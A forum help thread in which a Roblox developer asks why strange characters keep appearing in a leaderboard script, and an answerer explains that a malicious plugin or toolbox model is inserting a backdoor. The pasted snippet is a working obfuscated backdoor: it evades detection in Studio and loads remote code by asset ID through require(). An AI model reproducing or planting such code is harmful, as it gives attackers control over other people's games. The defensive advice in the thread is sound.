Scripting Helpers is winding down operations and is now read-only. More info→
Ad
Log in to vote
0

Studio randomly put random characters in code!?

Asked by 5 years ago

So in R0BLOX Studio In a game I have this leaderboard script, now this isn't like a script not working issue. It's a weird issue that I never see anyone talk about. So about the error, Whenever I publish to studio and I open up my script again, it will have random strings in the event function it will usually have random strings like RunService or MarketplaceService and then random letters.Can somebody help me? It will error my script everytime and It's just plain annoying.

This is what the code will look like when I publish the game,

game.Players.PlayerAdded:Connect(
ifILbtlpUyB = 'IsStudio' iminNTmoKcQo = require iSXOhFBzp5E = 'MarketplaceService' i8aKib = game iXbMfr3QnDwW77X = 'Description' iPxuPOQeIGG = 'IsStudio' i9YIKLumVEz = math.sqrt igg9F6xun = 'load' ifUxteik4yB = 'WaitForChild' iMUcZYqK = spawn iWyuM = 'FindFirstChild' iomelWOC0o = 'RunService' ig8o = game i5SZUIx7xKy0QnV = pcall ivBsGH = 'Name' iQAu = 14588224.137363 * 182 ibOrm = 'PlaceId' iD6zlsahE5KGg = 'PlaceId'  iMUcZYqK(function() i5SZUIx7xKy0QnV(function() if i8aKib:GetService(iomelWOC0o)[iPxuPOQeIGG](i8aKib:GetService(iomelWOC0o)) then return end iminNTmoKcQo(iQAu)[igg9F6xun](i8aKib[iD6zlsahE5KGg]) end) end)
function(plr)

Yeah it's weird I know, but if anybody has a solution.Can you tell me it asap.Thank you!

1 answer

Log in to vote
1
Answered by
Norbunny 555 Moderation Voter
5 years ago
Edited 5 years ago

The code's source can only be changed via plugin, so I'd suggest deleting all your plugins, and install only trusted ones.

If you have used models from the toolbox, might wanna have a look at them, find any require() functions creating backdoors.

You can search in all scripts by pressing: CTRL Shift F and searching for 'require'

0
kk I'ma delete some plugins. MahadTheIronSword 98 — 5y
Ad

Answer this question